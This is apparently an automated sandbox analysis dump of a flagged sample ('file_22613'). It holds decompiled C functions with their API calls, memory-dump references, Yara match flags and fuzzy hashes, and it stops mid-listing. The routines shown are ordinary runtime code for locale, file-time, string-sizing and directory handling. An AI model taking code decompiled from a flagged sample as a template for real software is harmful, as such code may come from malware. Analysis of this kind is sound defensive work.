                                                                                0x00430de1
                                                                                0x00430de6
                                                                                0x00430de9
                                                                                0x00430dec
                                                                                0x00430e14
                                                                                0x00430e1b
                                                                                0x00430e1d
                                                                                0x00430e9e
                                                                                0x00430eb0
                                                                                0x00430eb9
                                                                                0x00430ebb
                                                                                0x00430dfb
                                                                                0x00430dfb
                                                                                0x00430dfe
                                                                                0x00430e00
                                                                                0x00430e03
                                                                                0x00430e03
                                                                                0x00430e03
                                                                                0x00430e03
                                                                                0x00000000
                                                                                0x00430e09
                                                                                0x00430e7d
                                                                                0x00430e7d
                                                                                0x00430e82
                                                                                0x00430e88
                                                                                0x00430e8b
                                                                                0x00430e8d
                                                                                0x00430e90
                                                                                0x00430e90
                                                                                0x00430e90
                                                                                0x00430e90
                                                                                0x00000000
                                                                                0x00430e94
                                                                                0x00430e1f
                                                                                0x00430e22
                                                                                0x00430e22
                                                                                0x00430e28
                                                                                0x00430e2b
                                                                                0x00430e52
                                                                                0x00430e55
                                                                                0x00430e55
                                                                                0x00430e5b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00430e5d
                                                                                0x00430e60
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00430e62
                                                                                0x00430e62
                                                                                0x00430e62
                                                                                0x00430e68
                                                                                0x00430e6b
                                                                                0x00430dda
                                                                                0x00430dda
                                                                                0x00430e74
                                                                                0x00000000
                                                                                0x00430e74
                                                                                0x00430e2d
                                                                                0x00430e30
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00430e34
                                                                                0x00430e42
                                                                                0x00430e45
                                                                                0x00430e4b
                                                                                0x00430e4d
                                                                                0x00430e50
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00430e50
                                                                                0x00430dee
                                                                                0x00430df1
                                                                                0x00430df3
                                                                                0x00430df8
                                                                                0x00430df8
                                                                                0x00000000
                                                                                0x00430dc9
                                                                                0x00430dc9
                                                                                0x00430dce
                                                                                0x00430dd2
                                                                                0x00430dd2
                                                                                0x00000000
                                                                                0x00430dce
                                                                                0x00430dc7

                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00430DE1
                                                                                • __isleadbyte_l.LIBCMT ref: 00430E14
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,FF0734FF,?,00000000,?,?,?,00429936,?,?,00000001), ref: 00430E45
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,00429936,?,?,00000001), ref: 00430EB3
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: cca740873de6100d0439fcb3b3ed26cbfbc947964d1ef0800d9026635917cbb4
                                                                                • Instruction ID: 8d6d57008dd06d66464590a9c1f0dc6c998683f410bfc4bb48ed8463796450c2
                                                                                • Opcode Fuzzy Hash: cca740873de6100d0439fcb3b3ed26cbfbc947964d1ef0800d9026635917cbb4
                                                                                • Instruction Fuzzy Hash: 8F31F531600255EFCB10CFA4C8A1AAB7BF1BF09310F149AAEE4619B291E734ED40DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C7E605
                                                                                • __isleadbyte_l.LIBCMT ref: 00C7E639
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00C71E8F,?,00000000,00000000,?,?,?,?,00C71E8F,00000000,?), ref: 00C7E66A
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00C71E8F,00000001,00000000,00000000,?,?,?,?,00C71E8F,00000000,?), ref: 00C7E6D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 96400eb25e237afa90320cae856eda81f6f5d1cbf59716e31233b7de66c6f1c1
                                                                                • Instruction ID: 42d28d0623d54144757b8992b3ed8abd580cc5e5b76ecac494c64c76ba7c7aef
                                                                                • Opcode Fuzzy Hash: 96400eb25e237afa90320cae856eda81f6f5d1cbf59716e31233b7de66c6f1c1
                                                                                • Instruction Fuzzy Hash: 2831B272A00299EFDB20DF68C880AAE3BA5FF09315F15C5E9F4699B191E330DE40DB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0041DB2A(signed int _a4, signed int _a8, signed int _a9, char _a10) {
                                                                                				signed char _v7;
                                                                                				signed char _v8;
                                                                                				signed char _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t42;
                                                                                				signed int _t47;
                                                                                				signed int _t51;
                                                                                				signed int _t52;
                                                                                				intOrPtr _t57;
                                                                                				signed int _t59;
                                                                                				void* _t63;
                                                                                				signed int _t64;
                                                                                				void* _t72;
                                                                                				signed int _t76;
                                                                                
                                                                                				_t76 = _a8;
                                                                                				_t79 = _t76;
                                                                                				if(_t76 != 0) {
                                                                                					_v16 =  *_t76;
                                                                                					_t42 =  *((intOrPtr*)(_t76 + 4));
                                                                                				} else {
                                                                                					_v16 =  *((intOrPtr*)(E00422FD4(_t63, _t72, _t76, _t79) + 8));
                                                                                					_t42 = E00422FAE(_t63, _t72, _t76, _t79);
                                                                                				}
                                                                                				_v20 = _t42;
                                                                                				if(_v16 != 0) {
                                                                                					_push(_t63);
                                                                                					_t64 = _a4;
                                                                                					__eflags = _t64 - 0x100;
                                                                                					if(_t64 >= 0x100) {
                                                                                						L11:
                                                                                						__eflags = _t76;
                                                                                						if(__eflags != 0) {
                                                                                							_v12 = _t64;
                                                                                							_v12 = _v12 >> 8;
                                                                                							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
                                                                                							__eflags = _t47;
                                                                                							L14:
                                                                                							__eflags = _t47;
                                                                                							if(__eflags == 0) {
                                                                                								_a8 = _t64;
                                                                                								_a9 = 0;
                                                                                								__eflags = 1;
                                                                                							} else {
                                                                                								_push(2);
                                                                                								_a8 = _v12;
                                                                                								_a9 = _t64;
                                                                                								_a10 = 0;
                                                                                								_pop(1);
                                                                                							}
                                                                                							_t51 = E00422A1B(_t64, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
                                                                                							__eflags = _t51;
                                                                                							if(_t51 != 0) {
                                                                                								__eflags = _t51 - 1;
                                                                                								_t52 = _v8 & 0x000000ff;
                                                                                								if(_t51 != 1) {
                                                                                									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
                                                                                									__eflags = _t52;
                                                                                								}
                                                                                								goto L21;
                                                                                							} else {
                                                                                								L18:
                                                                                								_t52 = _t64;
                                                                                								L21:
                                                                                								return _t52;
                                                                                							}
                                                                                						}
                                                                                						L12:
                                                                                						_v12 = _t64;
                                                                                						_v12 = _v12 >> 8;
                                                                                						_t47 =  *(E00422A61(_t64, _t72, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
                                                                                						goto L14;
                                                                                					}
                                                                                					__eflags = _t76;
                                                                                					if(_t76 != 0) {
                                                                                						_t57 =  *((intOrPtr*)(_t76 + 8));
                                                                                						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
                                                                                						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
                                                                                							goto L18;
                                                                                						}
                                                                                						goto L11;
                                                                                					}
                                                                                					__eflags = E00422ADB(_t64);
                                                                                					if(__eflags != 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					goto L18;
                                                                                				} else {
                                                                                					_t59 = _a4;
                                                                                					if(_t59 - 0x41 > 0x19) {
                                                                                						return _t59;
                                                                                					}
                                                                                					return _t59 + 0x20;
                                                                                				}
                                                                                			}





















                                                                                0x0041db33
                                                                                0x0041db36
                                                                                0x0041db38
                                                                                0x0041db4e
                                                                                0x0041db51
                                                                                0x0041db3a
                                                                                0x0041db42
                                                                                0x0041db45
                                                                                0x0041db45
                                                                                0x0041db58
                                                                                0x0041db5b
                                                                                0x0041db74
                                                                                0x0041db75
                                                                                0x0041db7e
                                                                                0x0041db80
                                                                                0x0041db9f
                                                                                0x0041db9f
                                                                                0x0041dba1
                                                                                0x0041dbc1
                                                                                0x0041dbc4
                                                                                0x0041dbd7
                                                                                0x0041dbd7
                                                                                0x0041dbda
                                                                                0x0041dbda
                                                                                0x0041dbdc
                                                                                0x0041dbf2
                                                                                0x0041dbf5
                                                                                0x0041dbf9
                                                                                0x0041dbde
                                                                                0x0041dbe1
                                                                                0x0041dbe3
                                                                                0x0041dbe6
                                                                                0x0041dbe9
                                                                                0x0041dbed
                                                                                0x0041dbed
                                                                                0x0041dc10
                                                                                0x0041dc18
                                                                                0x0041dc1a
                                                                                0x0041dc20
                                                                                0x0041dc23
                                                                                0x0041dc27
                                                                                0x0041dc30
                                                                                0x0041dc30
                                                                                0x0041dc30
                                                                                0x00000000
                                                                                0x0041dc1c
                                                                                0x0041dc1c
                                                                                0x0041dc1c
                                                                                0x0041dc32
                                                                                0x00000000
                                                                                0x0041dc33
                                                                                0x0041dc1a
                                                                                0x0041dba3
                                                                                0x0041dba3
                                                                                0x0041dba6
                                                                                0x0041dbb7
                                                                                0x00000000
                                                                                0x0041dbb7
                                                                                0x0041db82
                                                                                0x0041db84
                                                                                0x0041db96
                                                                                0x0041db99
                                                                                0x0041db9d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041db9d
                                                                                0x0041db8d
                                                                                0x0041db8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0041db5d
                                                                                0x0041db5d
                                                                                0x0041db66
                                                                                0x0041dc36
                                                                                0x0041dc36
                                                                                0x00000000
                                                                                0x0041db6c

                                                                                APIs
                                                                                • ____lc_handle_func.LIBCMT ref: 0041DB3A
                                                                                  • Part of subcall function 00422FD4: __getptd.LIBCMT ref: 00422FD4
                                                                                • ____lc_codepage_func.LIBCMT ref: 0041DB45
                                                                                  • Part of subcall function 00422FAE: __getptd.LIBCMT ref: 00422FAE
                                                                                • ___pctype_func.LIBCMT ref: 0041DBAA
                                                                                • ___crtLCMapStringA.LIBCMT ref: 0041DC10
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                                                                • String ID:
                                                                                • API String ID: 3477544643-0
                                                                                • Opcode ID: fd5a285b8f110fab49c7bb52ebbf79be4fb128a6d147ffa5142546df80797410
                                                                                • Instruction ID: 89f854980cd5a03fb148403272f8b3ab2025cc482cf61d5f4636a3f22ba1e105
                                                                                • Opcode Fuzzy Hash: fd5a285b8f110fab49c7bb52ebbf79be4fb128a6d147ffa5142546df80797410
                                                                                • Instruction Fuzzy Hash: D131FBB1D08258BADF21CF59C9817EEBBB4AF10304F15845BE856DB251D2BCEAC0CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E0041C6AF(intOrPtr __ebx, void* _a4, void _a8) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				signed short _v28;
                                                                                				signed short _v32;
                                                                                				void* _v36;
                                                                                				struct _FILETIME _v44;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t42;
                                                                                				void* _t44;
                                                                                				void _t48;
                                                                                				intOrPtr _t54;
                                                                                				intOrPtr _t62;
                                                                                				void* _t65;
                                                                                				signed int _t71;
                                                                                
                                                                                				_t62 = __ebx;
                                                                                				_t42 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t42 ^ _t71;
                                                                                				_t44 = _a4;
                                                                                				_t69 = 0;
                                                                                				_t70 = __ebx + 0x70;
                                                                                				_v36 = _t44;
                                                                                				 *(__ebx + 0x7c) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x84)) = 0;
                                                                                				 *((char*)(__ebx + 0x80)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x78)) = 0;
                                                                                				 *_t70 = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x90)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x74)) = 0;
                                                                                				if(_t44 == 0 || _t44 == 0xffffffff) {
                                                                                					_t45 = 0x10000;
                                                                                				} else {
                                                                                					if(SetFilePointer( *(__ebx + 4), 0, 0, 1) == 0xffffffff) {
                                                                                						_t48 = _a8;
                                                                                						 *_t70 =  *_t70 | 0xffffffff;
                                                                                						 *((intOrPtr*)(__ebx + 0x4c)) = 0x80000000;
                                                                                						if(_t48 != 0) {
                                                                                							 *_t70 = _t48;
                                                                                						}
                                                                                						 *((char*)(_t62 + 0x6c)) = 0;
                                                                                						GetLocalTime( &_v24);
                                                                                						SystemTimeToFileTime( &_v24,  &_v44);
                                                                                						_push(_v44.dwHighDateTime);
                                                                                						_t69 =  &_v28;
                                                                                						_t70 =  &_v32;
                                                                                						E0041C12D( &_v28,  &_v32, _v44.dwLowDateTime);
                                                                                						_t54 = E0041C10B(_v44.dwLowDateTime, _v44.dwHighDateTime);
                                                                                						 *((intOrPtr*)(_t62 + 0x50)) = _t54;
                                                                                						 *((intOrPtr*)(_t62 + 0x58)) = _t54;
                                                                                						 *((intOrPtr*)(_t62 + 0x60)) = _t54;
                                                                                						_t65 = _t68;
                                                                                						 *((intOrPtr*)(_t62 + 0x5c)) = _t65;
                                                                                						 *((intOrPtr*)(_t62 + 0x64)) = _t65;
                                                                                						 *(_t62 + 0x68) = (_v32 & 0x0000ffff) << 0x00000010 | _v28 & 0x0000ffff;
                                                                                						 *((intOrPtr*)(_t62 + 0x54)) = _t68;
                                                                                						 *((intOrPtr*)(_t62 + 0x7c)) = _v36;
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_t70 = _v36;
                                                                                						_t68 = __ebx + 0x50;
                                                                                						if(E0041C194(_t70, __ebx + 0x50, __ebx + 0x4c, _t70, __ebx + 0x68) == 0) {
                                                                                							SetFilePointer(_t70, 0, 0, 0);
                                                                                							 *((char*)(__ebx + 0x6c)) = 1;
                                                                                							 *(__ebx + 0x7c) = _t70;
                                                                                							L5:
                                                                                							_t45 = 0;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t45, _t62, _v8 ^ _t71, _t68, _t69, _t70);
                                                                                			}


















                                                                                0x0041c6af
                                                                                0x0041c6b5
                                                                                0x0041c6bc
                                                                                0x0041c6bf
                                                                                0x0041c6c4
                                                                                0x0041c6c6
                                                                                0x0041c6c9
                                                                                0x0041c6cc
                                                                                0x0041c6cf
                                                                                0x0041c6d5
                                                                                0x0041c6dc
                                                                                0x0041c6df
                                                                                0x0041c6e1
                                                                                0x0041c6e7
                                                                                0x0041c6ec
                                                                                0x0041c7bd
                                                                                0x0041c6fb
                                                                                0x0041c70b
                                                                                0x0041c743
                                                                                0x0041c746
                                                                                0x0041c749
                                                                                0x0041c752
                                                                                0x0041c754
                                                                                0x0041c754
                                                                                0x0041c75a
                                                                                0x0041c75e
                                                                                0x0041c76c
                                                                                0x0041c772
                                                                                0x0041c775
                                                                                0x0041c77b
                                                                                0x0041c77e
                                                                                0x0041c789
                                                                                0x0041c78e
                                                                                0x0041c791
                                                                                0x0041c794
                                                                                0x0041c79b
                                                                                0x0041c79d
                                                                                0x0041c7a0
                                                                                0x0041c7af
                                                                                0x0041c7b5
                                                                                0x0041c7b8
                                                                                0x00000000
                                                                                0x0041c70d
                                                                                0x0041c712
                                                                                0x0041c718
                                                                                0x0041c728
                                                                                0x0041c732
                                                                                0x0041c738
                                                                                0x0041c73c
                                                                                0x0041c73f
                                                                                0x0041c73f
                                                                                0x0041c73f
                                                                                0x0041c728
                                                                                0x0041c70b
                                                                                0x0041c7cf

                                                                                APIs
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00440C98,00000000,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C702
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0041CC90,?,000003E8,?,00440C98,?), ref: 0041C732
                                                                                • GetLocalTime.KERNEL32(000003E8,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C75E
                                                                                • SystemTimeToFileTime.KERNEL32(000003E8,?,?,?,?,0041CC90,?,000003E8,?,00440C98,?,00000000), ref: 0041C76C
                                                                                  • Part of subcall function 0041C194: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041C1C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                • String ID:
                                                                                • API String ID: 3986731826-0
                                                                                • Opcode ID: f0a5f536456e36f3f1e3e9472c67a50ad49a119b57bd3d8a55eade869837fa14
                                                                                • Instruction ID: a4a204b0f49aa3fb0e77698da652ea75eef8bfc0e4b6c5fdb941cde4cbd239c3
                                                                                • Opcode Fuzzy Hash: f0a5f536456e36f3f1e3e9472c67a50ad49a119b57bd3d8a55eade869837fa14
                                                                                • Instruction Fuzzy Hash: 8E41497190020A9BCF14DF69C880ADEBBF8FF48310F1041AAE864EA296D7749985CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00417286(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				CHAR* _t27;
                                                                                				signed int _t28;
                                                                                				void* _t34;
                                                                                				CHAR* _t35;
                                                                                				void* _t44;
                                                                                				signed int _t45;
                                                                                				signed int _t46;
                                                                                				signed int _t53;
                                                                                				signed int _t57;
                                                                                				void* _t60;
                                                                                				void* _t61;
                                                                                
                                                                                				_push(8);
                                                                                				E00421975(E00436E16, __ebx, __edi, __esi);
                                                                                				 *(_t61 - 0x14) =  *(_t61 - 0x14) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t61 - 0x10)) =  *((intOrPtr*)(_t61 + 8));
                                                                                				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
                                                                                				_t27 =  *(_t61 + 0xc);
                                                                                				if( *((intOrPtr*)(_t61 + 0x20)) < 0x10) {
                                                                                					_t27 = _t61 + 0xc;
                                                                                				}
                                                                                				_t60 = lstrlenA;
                                                                                				_t28 = lstrlenA(_t27);
                                                                                				_t57 = 3;
                                                                                				_t45 = _t28;
                                                                                				_t53 = _t28 % _t57;
                                                                                				if(_t53 != 0) {
                                                                                					_t45 = _t45 - _t53 + _t57;
                                                                                				}
                                                                                				_t31 = _t45 << 3;
                                                                                				_t46 = 6;
                                                                                				_t34 = E0041E042((_t45 << 3) % _t46, _t57, _t60, _t31 / _t46 + 1);
                                                                                				_t58 =  *(_t61 + 0xc);
                                                                                				_t44 = _t34;
                                                                                				_t35 =  *(_t61 + 0xc);
                                                                                				if( *((intOrPtr*)(_t61 + 0x20)) < 0x10) {
                                                                                					_t35 = _t61 + 0xc;
                                                                                					_t58 = _t35;
                                                                                				}
                                                                                				E00417131(_t58, _t44, lstrlenA(_t35));
                                                                                				E0040C606( *((intOrPtr*)(_t61 - 0x10)), _t44);
                                                                                				E00402C34(_t61 + 0xc, 1, 0);
                                                                                				return E00421A4D( *((intOrPtr*)(_t61 - 0x10)));
                                                                                			}














                                                                                0x00417286
                                                                                0x0041728d
                                                                                0x00417295
                                                                                0x00417299
                                                                                0x0041729c
                                                                                0x004172a4
                                                                                0x004172a7
                                                                                0x004172a9
                                                                                0x004172a9
                                                                                0x004172ac
                                                                                0x004172b3
                                                                                0x004172b9
                                                                                0x004172ba
                                                                                0x004172bc
                                                                                0x004172c0
                                                                                0x004172c4
                                                                                0x004172c4
                                                                                0x004172ca
                                                                                0x004172cf
                                                                                0x004172d4
                                                                                0x004172dd
                                                                                0x004172e0
                                                                                0x004172e3
                                                                                0x004172e5
                                                                                0x004172e7
                                                                                0x004172ea
                                                                                0x004172ea
                                                                                0x004172f4
                                                                                0x004172fd
                                                                                0x00417309
                                                                                0x00417316

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041728D
                                                                                • lstrlenA.KERNEL32(?,00000008,0041165E,?,?,?,?,00000001,?,00000001,?,?,00000000,?,00000000), ref: 004172B3
                                                                                • _malloc.LIBCMT ref: 004172D4
                                                                                • lstrlenA.KERNEL32(?,?,?,00000001,?,00000001,?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 004172ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$H_prolog3_malloc
                                                                                • String ID:
                                                                                • API String ID: 2799043324-0
                                                                                • Opcode ID: 9593a3e882f26ebdfaf0bcf6cf8b617e22c68889b10c536c54a9677ec7e000a4
                                                                                • Instruction ID: 6016d9f24f4109661bf736fb44b3b208403491b93d93d039a9a610d1b91ad43b
                                                                                • Opcode Fuzzy Hash: 9593a3e882f26ebdfaf0bcf6cf8b617e22c68889b10c536c54a9677ec7e000a4
                                                                                • Instruction Fuzzy Hash: 48118231704208ABEF04DB65CD45BBE77A5EB94324F54842EF815DB281CBB8D945CB48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004333A1(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                				intOrPtr _t25;
                                                                                				void* _t26;
                                                                                
                                                                                				_t28 = __ebx;
                                                                                				_t25 = _a16;
                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                					_t26 = E00432C93(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                					goto L9;
                                                                                				} else {
                                                                                					_t35 = _t25 - 0x66;
                                                                                					if(_t25 != 0x66) {
                                                                                						__eflags = _t25 - 0x61;
                                                                                						if(_t25 == 0x61) {
                                                                                							L7:
                                                                                							_t26 = E00432D7A(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                						} else {
                                                                                							__eflags = _t25 - 0x41;
                                                                                							if(__eflags == 0) {
                                                                                								goto L7;
                                                                                							} else {
                                                                                								_t26 = E004332B4(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                							}
                                                                                						}
                                                                                						L9:
                                                                                						return _t26;
                                                                                					} else {
                                                                                						return E004331F3(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                					}
                                                                                				}
                                                                                			}





                                                                                0x004333a1
                                                                                0x004333a6
                                                                                0x004333ac
                                                                                0x0043341f
                                                                                0x00000000
                                                                                0x004333b3
                                                                                0x004333b3
                                                                                0x004333b6
                                                                                0x004333d1
                                                                                0x004333d4
                                                                                0x004333f4
                                                                                0x00433406
                                                                                0x004333d6
                                                                                0x004333d6
                                                                                0x004333d9
                                                                                0x00000000
                                                                                0x004333db
                                                                                0x004333ed
                                                                                0x004333ed
                                                                                0x004333d9
                                                                                0x00433424
                                                                                0x00433428
                                                                                0x004333b8
                                                                                0x004333d0
                                                                                0x004333d0
                                                                                0x004333b6

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction ID: abe1810ea6ee744b6de393a6a87c1c198501608181ec6297a64f3097f06e24e9
                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction Fuzzy Hash: AF114B3200014ABBCF125F85DC428EE7F62FB1D355F589416FE1899131D73ACAB2AB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004088DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t18;
                                                                                				CHAR* _t23;
                                                                                				short _t30;
                                                                                				void* _t37;
                                                                                				void* _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				_t41 = __eflags;
                                                                                				_t39 = __esi;
                                                                                				_t38 = __edi;
                                                                                				_push(0x24);
                                                                                				E004219DE(E00435EE4, __ebx, __edi, __esi);
                                                                                				_t30 = 0x5c;
                                                                                				 *((short*)(_t40 - 0x30)) = _t30;
                                                                                				_t18 = E0041F4CD(_t37, _t41,  *((intOrPtr*)(_t40 + 8)), _t40 - 0x30);
                                                                                				 *((intOrPtr*)(_t40 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t40 - 0x1c)) = 0;
                                                                                				 *(_t40 - 0x2c) = 0;
                                                                                				 *((intOrPtr*)(_t40 - 4)) = 0;
                                                                                				while(_t18 != 0) {
                                                                                					E0040C640(_t40 - 0x2c, _t18);
                                                                                					E0040C640(_t40 - 0x2c, "\\");
                                                                                					__eflags =  *((intOrPtr*)(_t40 - 0x18)) - 0x10;
                                                                                					_t23 =  *(_t40 - 0x2c);
                                                                                					if(__eflags < 0) {
                                                                                						_t23 = _t40 - 0x2c;
                                                                                					}
                                                                                					CreateDirectoryA(_t23, 0);
                                                                                					_t18 = E0041F4CD(_t37, __eflags, 0, _t40 - 0x30);
                                                                                				}
                                                                                				E00402C34(_t40 - 0x2c, 1, 0);
                                                                                				return E00421A61(0, _t38, _t39);
                                                                                			}









                                                                                0x004088db
                                                                                0x004088db
                                                                                0x004088db
                                                                                0x004088db
                                                                                0x004088e2
                                                                                0x004088ec
                                                                                0x004088ed
                                                                                0x004088f6
                                                                                0x004088ff
                                                                                0x00408906
                                                                                0x00408909
                                                                                0x0040890c
